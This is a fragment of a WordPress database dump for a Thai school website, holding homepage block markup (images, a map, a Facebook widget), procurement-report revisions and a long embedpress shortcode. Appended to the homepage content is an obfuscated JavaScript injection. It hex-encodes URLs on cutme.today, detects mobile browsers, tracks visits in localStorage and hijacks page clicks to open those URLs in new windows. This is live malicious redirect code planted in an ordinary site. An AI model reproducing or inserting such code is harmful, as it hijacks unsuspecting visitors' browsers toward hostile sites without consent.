href=\"http://pakhaeng.ssk.in.th/?page_id=741\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ดูเกรด.png\" alt=\"\" class=\"wp-image-724\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":725,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ห้องประชุม.png\" alt=\"\" class=\"wp-image-725\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":2,\"uniqueID\":\"6fe435-37\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-2 kt-inner-tab6fe435-37\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":726,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://slp.ssk.in.th/slweb/\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/SLIP-SSK-1.webp\" alt=\"\" class=\"wp-image-726\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":729,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=748\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/2-1.png\" alt=\"\" class=\"wp-image-729\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":808,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=810\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/คู่มือ.png\" alt=\"\" class=\"wp-image-808\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":727,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/smss/index.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/smss-ssk1.webp\" alt=\"\" class=\"wp-image-727\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":730,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/5.png\" alt=\"\" class=\"wp-image-730\" style=\"width:150px\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":728,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/admss.webp\" alt=\"\" class=\"wp-image-728\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":731,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/6.png\" alt=\"\" class=\"wp-image-731\" style=\"width:150px\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab --></div></div></div>\n<!-- /wp:kadence/tabs -->\n\n<!-- wp:loginout /--></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":3,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:paragraph {\"align\":\"center\",\"backgroundColor\":\"cyan-bluish-gray\",\"fontSize\":\"medium\"} -->\n<p class=\"has-text-align-center has-cyan-bluish-gray-background-color has-background has-medium-font-size\"><strong>แผนที่/ที่ตั้ง</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d5452.291688605335!2d104.62712667989774!3d14.917446024068381!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116c03ca70059ff%3A0x6b24a4a42a852eab!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lia4LmJ4Liy4LiZ4Lir4LiZ4Lit4LiH4Lib4Lil4Liy4LmA4LiC4LmH4LiH!5e0!3m2!1sth!2sth!4v1722057516298!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:image {\"id\":686,\"width\":\"auto\",\"height\":\"500px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Yellow-Clean-Contact-Us-Instagram-Post.png\" alt=\"\" class=\"wp-image-686\" style=\"aspect-ratio:1;object-fit:cover;width:auto;height:500px\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2FbannongpakhaengSchool%3Flocale%3Dth_TH&tabs=timeline&width=330&height=50&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n\n<!-- wp:shortcode -->\n[post-views]\n<!-- /wp:shortcode -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"fc945863\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2025-07-01 14:42:54','2025-07-01 07:42:54','',14,'http://pakhaeng.ssk.in.th/?p=1580',0,'revision','',0),
(1581,1,'2025-07-01 14:43:53','2025-07-01 07:43:53','','รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี งบประมาณ พ.ศ .2567','','inherit','closed','closed','','1571-revision-v1','','','2025-07-01 14:43:53','2025-07-01 07:43:53','',1571,'http://pakhaeng.ssk.in.th/?p=1581',0,'revision','',0),
(1582,1,'2025-07-01 14:45:19','2025-07-01 07:45:19','','รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี งบประมาณ พ.ศ .2567','','inherit','closed','closed','','1571-revision-v1','','','2025-07-01 14:45:19','2025-07-01 07:45:19','',1571,'http://pakhaeng.ssk.in.th/?p=1582',0,'revision','',0),
(1583,1,'2025-07-01 14:45:19','2025-07-01 07:45:19','','Elementor #1571','','inherit','closed','closed','','1571-revision-v1','','','2025-07-01 14:45:19','2025-07-01 07:45:19','',1571,'http://pakhaeng.ssk.in.th/?p=1583',0,'revision','',0),
(1584,1,'2025-07-01 14:45:19','2025-07-01 07:45:19','[embedpress prefix_nftcreator=\'false\' prefix_nftprice=\'false\' prefix_nftlastsale=\'false\' label_nftbutton=\'false\' loadmorelabel=\'false\' label_nftrank=\'false\' label_nftdetails=\'false\' instafeedFollowBtnLabel=\'false\' instafeedPostsCountText=\'false\' instafeedFollowersCountText=\'false\' instafeedPopupFollowBtnLabel=\'false\' instafeedLoadmoreLabel=\'false\' cPopupButtonText=\'false\' adWidth=\'false\' adHeight=\'false\' adStart=\'false\' adSkipButtonAfter=\'false\' embedpress_protection_message=\'false\' embedpress_lock_content_error_message=\'false\' embedpress_password_placeholder=\'false\' embedpress_submit_button_text=\'false\' embedpress_submit_Unlocking_text=\'false\' embedpress_lock_content_heading=\'false\' embedpress_lock_content_sub_heading=\'false\' embedpress_lock_content_footer_message=\'false\' height=\'800\' align=\'center\' embedpress_pro_embeded_source=\'default\' instafeedFeedType=\'false\' instafeedAccountType=\'false\' embedpress_pro_embeded_nft_type=\'false\' embedpress_embeded_link=\'false\' embedpress_audio_video_auto_pause=\'false\' spotify_theme=\'false\' emberpress_custom_player=\'false\' custom_payer_preset=\'false\' embedpress_pro_video_start_time=\'false\' embedpress_pro_youtube_end_time=\'false\' embedpress_player_color=\'false\' embedpress_pro_vimeo_auto_play=\'false\' embedpress_pro_vimeo_autopause=\'false\' embedpress_pro_vimeo_dnt=\'false\' embedpress_pro_youtube_auto_play=\'false\' embedpress_pro_youtube_mute=\'false\' embedpress_pro_youtube_display_controls=\'false\' embedpress_pro_youtube_enable_fullscreen_button=\'false\' embedpress_pro_youtube_display_video_annotations=\'false\' embedpress_pro_youtube_progress_bar_color=\'false\' embedpress_pro_youtube_force_closed_captions=\'false\' embedpress_pro_youtube_modest_branding=\'false\' embepress_player_restart=\'false\' embepress_player_rewind=\'false\' embepress_player_fast_forward=\'false\' embepress_player_tooltip=\'false\' embepress_player_hide_controls=\'false\' embepress_player_download=\'false\' embepress_player_always_on_top=\'false\' embedpress_pro_youtube_display_related_videos=\'false\' embedpress_player_poster_thumbnail=\'false\' embedpress_pro_youtube_logo=\'false\' embedpress_pro_youtube_logo_size=\'false\' embedpress_pro_youtube_logo_custom_dimension=\'false\' embedpress_pro_youtube_logo_xpos=\'false\' embedpress_pro_youtube_logo_ypos=\'false\' embedpress_pro_youtube_logo_opacity=\'false\' embedpress_pro_youtube_logo_opacity_hover=\'false\' embedpress_pro_youtube_cta=\'false\' embedpress_pro_vimeo_color=\'false\' embedpress_pro_vimeo_display_title=\'false\' embedpress_pro_vimeo_display_author=\'false\' embedpress_pro_vimeo_avatar=\'false\' embedpress_pro_vimeo_loop=\'false\' embedpress_pro_vimeo_logo=\'false\' embedpress_pro_vimeo_logo_size=\'false\' embedpress_pro_vimeo_logo_custom_dimension=\'false\' embedpress_pro_vimeo_logo_xpos=\'false\' embedpress_pro_vimeo_logo_ypos=\'false\' embedpress_pro_vimeo_logo_opacity=\'false\' embedpress_pro_vimeo_logo_opacity_hover=\'false\' embedpress_pro_vimeo_cta=\'false\' embedpress_pro_wistia_auto_play=\'false\' embedpress_pro_wistia_color=\'false\' embedpress_pro_wistia_fullscreen_button=\'false\' embedpress_pro_wistia_small_play_button=\'false\' embedpress_pro_wistia_captions=\'false\' embedpress_pro_wistia_captions_enabled_by_default=\'false\' embedpress_pro_wistia_playbar=\'false\' embedpress_pro_wistia_volume_control=\'false\' embedpress_pro_wistia_volume=\'false\' embedpress_pro_wistia_logo=\'false\' embedpress_pro_wistia_logo_size=\'false\' embedpress_pro_wistia_logo_custom_dimension=\'false\' embedpress_pro_wistia_logo_xpos=\'false\' embedpress_pro_wistia_logo_ypos=\'false\' embedpress_pro_wistia_logo_opacity=\'false\' embedpress_pro_wistia_logo_opacity_hover=\'false\' embedpress_pro_wistia_cta=\'false\' embedpress_pro_soundcloud_visual=\'false\' embedpress_pro_soundcloud_color=\'false\' embedpress_pro_soundcloud_autoplay=\'false\' embedpress_pro_soundcloud_share_button=\'false\' embedpress_pro_soundcloud_comments=\'false\' embedpress_pro_soundcloud_artwork=\'false\' embedpress_pro_soundcloud_play_count=\'false\' embedpress_pro_soundcloud_user_name=\'false\' embedpress_pro_soundcloud_buy_button=\'false\' embedpress_pro_soundcloud_download_button=\'false\' embedpress_pro_dailymotion_ui_logo=\'false\' embedpress_pro_dailymotion_autoplay=\'false\' embedpress_pro_dailymotion_play_on_mobile=\'false\' embedpress_pro_dailymotion_mute=\'false\' embedpress_pro_dailymotion_player_control=\'false\' embedpress_pro_dailymotion_video_info=\'false\' embedpress_pro_dailymotion_control_color=\'false\' embedpress_pro_dailymotion_logo=\'false\' embedpress_pro_dailymotion_logo_size=\'false\' embedpress_pro_dailymotion_logo_custom_dimension=\'false\' embedpress_pro_dailymotion_logo_xpos=\'false\' embedpress_pro_dailymotion_logo_ypos=\'false\' embedpress_pro_dailymotion_logo_opacity=\'false\' embedpress_pro_dailymotion_logo_opacity_hover=\'false\' embedpress_pro_dailymotion_cta=\'false\' embedpress_pro_twitch_autoplay=\'false\' embedpress_pro_fs=\'false\' embedpress_pro_twitch_chat=\'false\' embedpress_pro_twitch_mute=\'false\' embedpress_pro_twitch_theme=\'false\' embedpress_pro_twitch_logo=\'false\' embedpress_pro_twitch_logo_size=\'false\' embedpress_pro_twitch_logo_custom_dimension=\'false\' embedpress_pro_twitch_logo_xpos=\'false\' embedpress_pro_twitch_logo_ypos=\'false\' embedpress_pro_twitch_logo_opacity=\'false\' embedpress_pro_twitch_logo_opacity_hover=\'false\' embedpress_pro_twitch_cta=\'false\' limit=\'false\' orderby=\'false\' ytChannelLayout=\'false\' pagesize=\'false\' columns=\'false\' gapbetweenvideos=\'false\' pagination=\'false\' yt_sub_channel=\'false\' yt_sub_text=\'false\' yt_sub_layout=\'false\' yt_sub_theme=\'false\' yt_sub_count=\'false\' yt_lc_show=\'false\' layout=\'false\' preset=\'false\' nftperrow=\'false\' gapbetweenitem=\'false\' collectionname=\'false\' nftimage=\'false\' nfttitle=\'false\' nftcreator=\'false\' nftprice=\'false\' nftlastsale=\'false\' nftbutton=\'false\' loadmore=\'false\' itemperpage=\'false\' nftrank=\'false\' nftdetails=\'false\' instafeedProfileImage=\'false\' instafeedProfileImageUrl=\'false\' instafeedFollowBtn=\'false\' instafeedPostsCount=\'false\' instafeedFollowersCount=\'false\' instafeedAccName=\'false\' instaLayout=\'false\' instafeedColumns=\'false\' instafeedColumnsGap=\'false\' embedpress_instafeed_slide_show=\'false\' embedpress_carousel_autoplay=\'false\' embedpress_carousel_autoplay_speed=\'false\' embedpress_carousel_transition_speed=\'false\' embedpress_carousel_loop=\'false\' embedpress_carousel_arrows=\'false\' embedpress_carousel_spacing=\'false\' instafeedPostsPerPage=\'false\' instafeedTab=\'false\' instafeedLikesCount=\'false\' instafeedCommentsCount=\'false\' instafeedPopup=\'false\' instafeedPopupFollowBtn=\'false\' instafeedLoadmore=\'false\' cEmbedType=\'false\' cPopupButtonTextColor=\'false\' cPopupButtonBGColor=\'false\' calendlyData=\'false\' hideCookieBanner=\'false\' hideEventTypeDetails=\'false\' cBackgroundColor=\'false\' cTextColor=\'false\' cButtonLinkColor=\'false\' theme=\'false\' color=\'false\' coverImageUrl=\'false\' hideDownload=\'false\' playlist=\'false\' playlistContinuous=\'false\' playlistLoop=\'false\' playlistAutoupdate=\'false\' hidePlaylistDescriptions=\'false\' hidePlaylistImages=\'false\' episodeImagePosition=\'false\' showChaptersImage=\'false\' hideLikes=\'false\' hideComments=\'false\' hideSharing=\'false\' hideLogo=\'false\' hideEpisodeDescription=\'false\' mode=\'false\' playerAutoplay=\'false\' delay=\'false\' repeat=\'false\' backgroundColor=\'false\' expiration=\'false\' adManager=\'false\' adSource=\'false\' adFileUrl=\'false\' adFileUrl1=\'false\' adXPosition=\'false\' adYPosition=\'false\' adUrl=\'false\' adSkipButton=\'false\' embedpress_lock_content=\'false\' embedpress_protection_type=\'false\' embedpress_select_roles=\'false\' embedpress_lock_content_password=\'false\' embedpress_enable_footer_message=\'false\' embedpress_content_share=\'false\' embedpress_content_share_position=\'false\' embedpress_content_title=\'false\' embedpress_content_descripiton=\'false\' embedpress_content_share_custom_thumbnail=\'false\' embedpress_share_facebook=\'false\' 